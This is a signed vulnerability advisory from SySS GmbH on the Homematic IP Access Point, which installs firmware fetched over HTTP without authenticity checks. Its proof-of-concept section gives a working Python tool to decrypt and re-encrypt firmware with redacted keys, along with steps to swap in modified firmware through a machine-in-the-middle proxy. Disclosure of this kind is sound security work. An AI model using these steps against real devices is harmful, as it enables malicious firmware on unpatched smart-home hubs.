-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-054 Product: Homematic IP Access Point (HmIP-HAP) Manufacturer: eQ-3 Affected Version(s): Bootloader: v3.0.8 Application v3.0.18 Tested Version(s): Bootloader: v3.0.8 Application v3.0.18 Vulnerability Type: Download of Code Without Integrity Check (CWE-494) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2025-08-25 Solution Date: - Public Disclosure: 2026-02-03 CVE Reference: Not yet assigned Author of Advisory: Jan Wütherich, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Homematic IP Access Point is a core component of the Homematic IP smart home system. It acts as a bridge between Homematic IP devices and the Homematic IP cloud. The manufacturer describes the product as follows (see [1]): "This is where the heart of your smart home beats: You can conveniently set up your smart home system via the Homematic IP access point. This enables you to control it intuitively with the smartphone app. To do that, just connect the access point via a network cable. And you're finished!" Due to missing authenticity checks during the update process, the device is vulnerable to malicious code injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Homematic IP Access Point checks for firmware updates over HTTP and downloads the local bootloader, web bootloader, and application updates over HTTP. Update files contain several encrypted "chunks" that include records of firmware data to be written to the internal flash memory. Each chunk is encrypted using AES-128-CBC and contains a CRC32 checksum at the end. The local bootloader, web bootloader, and application updates are all encrypted with separate keys and initialization vectors (IVs), which are the same for every device model. After the firmware has been written to the flash memory, it is checked on every boot using a CRC32 over the flash memory contents. There is no authenticity verification before writing the files to the device's internal flash memory. An attacker can encrypt a modified firmware with malicious contents and intercept the HTTP traffic using a machine-in-the-middle attack. By providing the malicious file to the update request, it is then written to the internal flash memory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): A proof-of-concept software tool was written to decrypt and encrypt the firmware. ############################################################################################## import argparse import struct import crcmod from Crypto.Cipher import AES crc32_func = crcmod.mkCrcFun(0x104c11db7, rev=False, initCrc=0xFFFFFFFF, xorOut=0) def process_file(command, input_file, output_file, key_hex, key_iv): key = bytearray.fromhex(key_hex) iv = bytearray.fromhex(key_iv) cipher = AES.new(key, AES.MODE_CBC, iv=iv) while True: size_data = input_file.read(2) if not size_data: break # EOF size, = struct.unpack(">H", size_data) output_file.write(size_data) buffer = input_file.read(size - 4) if len(buffer) != size - 4: raise Exception("Unexpected EOF") if command == "decrypt": expected_crc, = struct.unpack(">I", input_file.read(4)) calculated_crc = crc32_func(buffer) if calculated_crc != expected_crc: raise Exception(f"Invalid CRC ({calculated_crc:08x} vs {expected_crc:08x})") decrypted = cipher.decrypt(buffer) output_file.write(decrypted) output_file.write(struct.pack(">I", crc32_func(decrypted))) elif command == "encrypt": # CRC is ignored _crc, = struct.unpack(">I", input_file.read(4)) encrypted = cipher.encrypt(buffer) output_file.write(encrypted) output_file.write(struct.pack(">I", crc32_func(encrypted))) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('command', choices=['decrypt', 'encrypt'], help='Command to execute') parser.add_argument('input_file', type=argparse.FileType('rb')) parser.add_argument('output_file', type=argparse.FileType('wb')) parser.add_argument('--key', required=True) parser.add_argument('--iv', required=True) args = parser.parse_args() with args.input_file as infile, args.output_file as outfile: process_file(args.command, infile, outfile, args.key, args.iv) ############################################################################################## With this software tool and the correct key and IV, the local bootloader update file can be successfully decrypted. The key and IV are the same for every device and have been extracted from a Homematic IP Access Point. They are replaced with placeholder values for this example: python cryptfw_clean.py --key 00000000000000000000000000000000 --iv 00000000000000000000000000000000 decrypt HMIP-HAP-local_bootloader_update.bin decrypted.bin After decryption, additional parsing is required to process the contained records and frames. After modifying the file, the CRC32 at the end must be manually adjusted, and then the file can be reencrypted: python cryptfw_clean.py --key 00000000000000000000000000000000 --iv 00000000000000000000000000000000 encrypt decrypted.bin HMIP-HAP-local_bootloader_update.bin Using Burp Suite or a different proxy software, the update data response is intercepted, and the hexadecimal data is replaced with the data from the reencrypted file. The device now writes the modified update file into the internal flash memory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: SySS GmbH is not aware of a solution for the described security issue. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-07-23: Vulnerability discovered 2025-08-25: Vulnerability reported to manufacturer 2025-09-04: Vulnerability reported to manufacturer again 2026-02-03: Public disclosure of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Homematic IP Access Point https://homematic-ip.com/en/product/access-point [2] SySS Security Advisory SYSS-2025-054 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-054.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Jan Wütherich of SySS GmbH. E-Mail: jan.wuetherich@syss.de ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQJHBAEBCgAxFiEE4TVOI2CRqFyeFFd6KN+zpwqYqdQFAml7ZcUTHGRpc2Nsb3N1 cmVAc3lzcy5kZQAKCRAo37OnCpip1G1cD/9TfK03N7AdA7wH5N2uApmqfVu2k5rp MrYHUTvv95iIlBE8pi8bC55Lj8IPzvO4f7tE3EXR8bBMJP++HBUVSzsgWwp44IiH IHhbQTzXUofMDqu0qAi8//G24jVvBoc5Hqewnwb1mGjQ2LHSRoQWVyzCcy/CVfOi OGQOFcufwJ/urjBKTEpMx0yxJmtO+t4jBGfjqx7jdbGc6Aa/xXRtPRgKlVFRKL7h 9TQhRsPw9YsejCRJace5nxjkpGNE20MNrG5CPlMGy/7m14COU3zi0G0EjLzaDTTc /r8nrZlx3zzuLAd4cLgRqHQvMCMb7xcFSDyjOHxz4W6R42GyX3llaSfsquHN+1cx zINdHZwrMKn9pTk0GeQM8K8p83D5m8Waa0GtSJdLa9f225+1o5zWth08Fph1oTBr p2vwapFnCVsGbLL9AH4QYx1D6Cc4u75Hd4h9z1tJaj8PB5OY5Q/yQ/Dm8flUXobA qPSgsMuq+jEO563OQJDGDAewkgQb/gn3NhRlmGn3dkqPl9EO2GS5kqUVg5Gi2zmR LI4FqWBgmh0LX2IAeQG5m0neMLqZnBxC0ay42tUylfOJJMIoFqilIh2QIi56jM2J XewaU2DzY5nUETddcRFnt6OiMXBcrww2mPEmEAXCHKjwGcTV5+rK7n9bZwXKEUt7 VybY21x2oHj68Q== =gMs0 -----END PGP SIGNATURE-----